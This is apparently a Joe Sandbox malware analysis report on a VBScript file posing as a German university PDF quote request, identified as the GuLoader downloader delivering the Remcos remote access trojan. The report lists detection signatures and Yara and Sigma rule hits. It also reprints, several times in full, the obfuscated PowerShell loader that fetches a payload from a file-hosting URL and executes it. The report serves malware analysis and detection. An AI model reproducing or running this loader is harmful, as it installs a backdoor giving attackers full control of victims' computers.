Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs

Overview

General Information

Sample name:ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:ANGEBOTSANFRAGE (Universitt Klagenfurt) 10-03-2025pdf.vbs
Analysis ID:1634190
MD5:8021cc623d59a1db7f0f3e305f370449
SHA1:674669f5ded1c632e1d18b149f902ca41c00fdb2
SHA256:a354b3d778c617b5abfd7e9717e095053838e9c1e5eed9cc03937a9ca85d97c6
Tags:DEUgeoRATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 6416 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuh ArbeFru aExtrrKun tF rueaglyd');$svaledes=Paining 'Sm.g$MiljUUvitdkapifMidtl .ala Misa TeedV lcdNonne ismnTe.eeantis Udh.Fo lDAnf osogew V gnAkkol P eo aasa,impdKontFOveriOverlKunaeMati(D,on$Ge mDdr,liInves stab N uudrisr UnbsBargahircbGteslUtaieA ch,Brig$ OveMSpaciStadlkondiRefoePla u Tvib R veforysAkkok Un yNonutTag.tjul eBrkdlFyr sNybaeSildsMeiok renostarnIndbvS,lfeSylln hrtTechi AnhoCorrnHandeUnn rOas sGrib)';$Milieubeskyttelseskonventioners=$Pavins;Spuledes (Paining ' Sp.$Po cgWienL rooFornbNyttatr mlAnlb:ParkLCampEPse dUnmagSkrae ycnR Kar=Jord(Loo TS,ibEB.giS skotNonm-NonsPAttraRecut FarHDbef Ste $s bsmkramiMeetlvigoI HexeSkr uFacibSpdlE.rtisT kskTidsYDel.T Me TBagsESkiplSognsU,brE BesS fl KTrumoGuttNMisdvUnexEmou N TrutCottIAmplODilaNR maEaf.pRthersLs e)');while (!$Ledger) {Spuledes (Paining 'util$unbagOpfolMipsoBemibCadeaCabilKuwa:C,biASexldA foe CenqTopauBil aBisecArbey fo,=Opsl$FrugBDesie TilhChieaFrotlDakfvD,nde Mals') ;Spuledes $svaledes;Spuledes (Paining 'Hypo[FldetSekuh vorRK rteNontArapiDGia,IUddaN apagChe . ubT inchEs irConce Egea rhvDLap.]Doze: Ind:G mpSSproLTimpETrigE S.np ath(Taft4Vejr0 aas0Trne0 und)');Spuledes (Paining ' Ta $P.ebgStrulGulvo diab Anta ollDeko:DeniLbetaESubtdRav.gVideESundRKran=O es(La,gT itzETop SSmaat Ove- oliPLe fAP efT Su HYrsn Bes$UngemHarmISlidlStirIsaboE UnduTr,aBHei eLic s rizK DipYWalet ClytRo,seSkolL ForSSkipeAllosMis KLaccO traNSkovVContETykkn ProTP.trIParrORoasNK.nfeGyror ,olsKran)') ;Spuledes (Paining ' mpl$RistGDe oLSarcOTriabKonsATricLOo i:Di,peNe,scDinghNonnuretocGedeaOlan=Over$Si.iGConylEnscOF lkBAnseaFljml Mis:EldrhBattAK nkrOv rr EnsiLnkoSUncoBsociuOmp R M,xgDeni+ to+Likv%Ento$MemoM Flyama.amCowfMAetho rskNKbspISk lSMal,MFolk. rrc StaO ppoUToten kriT') ;$Disbursable=$Mammonism[$Echuca]}$Pollster=334368;$Barytocelestite=30065;Spuledes (Paining 'funk$la rGM usLM ljoTraib moeAGgedlkons:MartlPetuy KlisStarK enO GulpFiskI D,msPige Mast=El,v G lg Po ESlagt Rom-se kc ,neoRussNSnertTi fEde iNNimbtTeab Rosb$SounMMaltIKlaslSe,rIBedrET opUEctoBGalgEMo uSAd.rkSubsYReg.tnessTTjave VelLProrSUneleL ngsSmokkMileosvinnMiljVUniveSt.rNmodttRegeI ourO ArbnFordEAdhir .onS');Spuledes (Paining 'Berr$SlidgTe nlOlieo,limbFarvaNonalSk d:KakoGDintoStrbrUdtrdDiseiSemioDammiSa,tdReci qui =Poly Tu.n[UnadS nsty kossKro.t aareFablmE,te.Par CLithoStninSalvvTileeN torBasitSkjo] app:Kemi:R siFBhlarWienoCa em UdvBFgtea blgs Omve,sce6Term4AbsoSsandtViserwhitiunshnbetog art(Aff $BortLBidsyUdbos OnekHelsoYp epTropi leksV.rv)');Spuledes (Paining 'pror$Sta.GHornlAtomO f sBS.niaKvruLU,gr:OutcTLngdeForetCh krCentAEye PCobsH TmmOE,tlS TripElash In,A RidtnoneEStra knyt=Deli Otio[Quans HexyAutosMototSammeVaa m mph. evTReasEScioXOr,ot exp.ForseFablNopdaCEft,OquadDUnw,i utoN ConGUnus]Past:miss:Hecta EulsSvincP ctIRas I.pst.RepaGC,moeBumpTKaprSYodltR spr Da iB,omn aneGAut ( igh$ToadGb,ocoTer,rUdmed TorI NumoafstI ,andBlge)');Spuledes (Paining ' Bes$ idrGTetrlTithOByrdbUdliATindL E c:P rtPServaHalvu.arbL jeriStirNSpejIFrafaWiddN Und5 bem2Tel.=baer$H antV.ltEPre,TUdperT,phaParoPSk lhshanosesqsOvnsPRenaH Br AtaxaT Gr,ERegi.CuncSForsUProjB PalSB kgTammoR SkiiSkyrN cupgMeta(Kl b$BetjpF.lkoTherLBaksL Bais SoltDobleAse RMa.s,Fru,$.ubwbCer AReslRAn,yYSaksTdksbOLi.pCUrtie.estLBilieKjersU ontHuskIOrthTWindEP ro)');Spuledes $Paulinian52;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4232 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7356 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuh ArbeFru aExtrrKun tF rueaglyd');$svaledes=Paining 'Sm.g$MiljUUvitdkapifMidtl .ala Misa TeedV lcdNonne ismnTe.eeantis Udh.Fo lDAnf osogew V gnAkkol P eo aasa,impdKontFOveriOverlKunaeMati(D,on$Ge mDdr,liInves stab N uudrisr UnbsBargahircbGteslUtaieA ch,Brig$ OveMSpaciStadlkondiRefoePla u Tvib R veforysAkkok Un yNonutTag.tjul eBrkdlFyr sNybaeSildsMeiok renostarnIndbvS,lfeSylln hrtTechi AnhoCorrnHandeUnn rOas sGrib)';$Milieubeskyttelseskonventioners=$Pavins;Spuledes (Paining ' Sp.$Po cgWienL rooFornbNyttatr mlAnlb:ParkLCampEPse dUnmagSkrae ycnR Kar=Jord(Loo TS,ibEB.giS skotNonm-NonsPAttraRecut FarHDbef Ste $s bsmkramiMeetlvigoI HexeSkr uFacibSpdlE.rtisT kskTidsYDel.T Me TBagsESkiplSognsU,brE BesS fl KTrumoGuttNMisdvUnexEmou N TrutCottIAmplODilaNR maEaf.pRthersLs e)');while (!$Ledger) {Spuledes (Paining 'util$unbagOpfolMipsoBemibCadeaCabilKuwa:C,biASexldA foe CenqTopauBil aBisecArbey fo,=Opsl$FrugBDesie TilhChieaFrotlDakfvD,nde Mals') ;Spuledes $svaledes;Spuledes (Paining 'Hypo[FldetSekuh vorRK rteNontArapiDGia,IUddaN apagChe . ubT inchEs irConce Egea rhvDLap.]Doze: Ind:G mpSSproLTimpETrigE S.np ath(Taft4Vejr0 aas0Trne0 und)');Spuledes (Paining ' Ta $P.ebgStrulGulvo diab Anta ollDeko:DeniLbetaESubtdRav.gVideESundRKran=O es(La,gT itzETop SSmaat Ove- oliPLe fAP efT Su HYrsn Bes$UngemHarmISlidlStirIsaboE UnduTr,aBHei eLic s rizK DipYWalet ClytRo,seSkolL ForSSkipeAllosMis KLaccO traNSkovVContETykkn ProTP.trIParrORoasNK.nfeGyror ,olsKran)') ;Spuledes (Paining ' mpl$RistGDe oLSarcOTriabKonsATricLOo i:Di,peNe,scDinghNonnuretocGedeaOlan=Over$Si.iGConylEnscOF lkBAnseaFljml Mis:EldrhBattAK nkrOv rr EnsiLnkoSUncoBsociuOmp R M,xgDeni+ to+Likv%Ento$MemoM Flyama.amCowfMAetho rskNKbspISk lSMal,MFolk. rrc StaO ppoUToten kriT') ;$Disbursable=$Mammonism[$Echuca]}$Pollster=334368;$Barytocelestite=30065;Spuledes (Paining 'funk$la rGM usLM ljoTraib moeAGgedlkons:MartlPetuy KlisStarK enO GulpFiskI D,msPige Mast=El,v G lg Po ESlagt Rom-se kc ,neoRussNSnertTi fEde iNNimbtTeab Rosb$SounMMaltIKlaslSe,rIBedrET opUEctoBGalgEMo uSAd.rkSubsYReg.tnessTTjave VelLProrSUneleL ngsSmokkMileosvinnMiljVUniveSt.rNmodttRegeI ourO ArbnFordEAdhir .onS');Spuledes (Paining 'Berr$SlidgTe nlOlieo,limbFarvaNonalSk d:KakoGDintoStrbrUdtrdDiseiSemioDammiSa,tdReci qui =Poly Tu.n[UnadS nsty kossKro.t aareFablmE,te.Par CLithoStninSalvvTileeN torBasitSkjo] app:Kemi:R siFBhlarWienoCa em UdvBFgtea blgs Omve,sce6Term4AbsoSsandtViserwhitiunshnbetog art(Aff $BortLBidsyUdbos OnekHelsoYp epTropi leksV.rv)');Spuledes (Paining 'pror$Sta.GHornlAtomO f sBS.niaKvruLU,gr:OutcTLngdeForetCh krCentAEye PCobsH TmmOE,tlS TripElash In,A RidtnoneEStra knyt=Deli Otio[Quans HexyAutosMototSammeVaa m mph. evTReasEScioXOr,ot exp.ForseFablNopdaCEft,OquadDUnw,i utoN ConGUnus]Past:miss:Hecta EulsSvincP ctIRas I.pst.RepaGC,moeBumpTKaprSYodltR spr Da iB,omn aneGAut ( igh$ToadGb,ocoTer,rUdmed TorI NumoafstI ,andBlge)');Spuledes (Paining ' Bes$ idrGTetrlTithOByrdbUdliATindL E c:P rtPServaHalvu.arbL jeriStirNSpejIFrafaWiddN Und5 bem2Tel.=baer$H antV.ltEPre,TUdperT,phaParoPSk lhshanosesqsOvnsPRenaH Br AtaxaT Gr,ERegi.CuncSForsUProjB PalSB kgTammoR SkiiSkyrN cupgMeta(Kl b$BetjpF.lkoTherLBaksL Bais SoltDobleAse RMa.s,Fru,$.ubwbCer AReslRAn,yYSaksTdksbOLi.pCUrtie.estLBilieKjersU ontHuskIOrthTWindEP ro)');Spuledes $Paulinian52;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7632 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7836 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1697743441.0000000008EE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1680502700.0000000005F69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000E.00000002.1697979779.000000000AC0F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_4504.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_4504.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfd6f:$b2: ::FromBase64String(
              • 0xd0b9:$s1: -join
              • 0x6865:$s4: +=
              • 0x6927:$s4: +=
              • 0xab4e:$s4: +=
              • 0xcc6b:$s4: +=
              • 0xcf55:$s4: +=
              • 0xd09b:$s4: +=
              • 0xf451:$s4: +=
              • 0xf4d1:$s4: +=
              • 0xf597:$s4: +=
              • 0xf617:$s4: +=
              • 0xf7ed:$s4: +=
              • 0xf871:$s4: +=
              • 0xd8d3:$e4: Get-WmiObject
              • 0xdac2:$e4: Get-Process
              • 0xdb1a:$e4: Start-Process
              amsi32_7356.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa8d6:$b2: ::FromBase64String(
              • 0x9951:$s1: -join
              • 0x30fd:$s4: +=
              • 0x31bf:$s4: +=
              • 0x73e6:$s4: +=
              • 0x9503:$s4: +=
              • 0x97ed:$s4: +=
              • 0x9933:$s4: +=
              • 0x13836:$s4: +=
              • 0x138b6:$s4: +=
              • 0x1397c:$s4: +=
              • 0x139fc:$s4: +=
              • 0x13bd2:$s4: +=
              • 0x13c56:$s4: +=
              • 0xa16b:$e4: Get-WmiObject
              • 0xa35a:$e4: Get-Process
              • 0xa3b2:$e4: Start-Process
              • 0x144a7:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", ProcessId: 7032, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7632, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49696
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs", ProcessId: 7032, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- 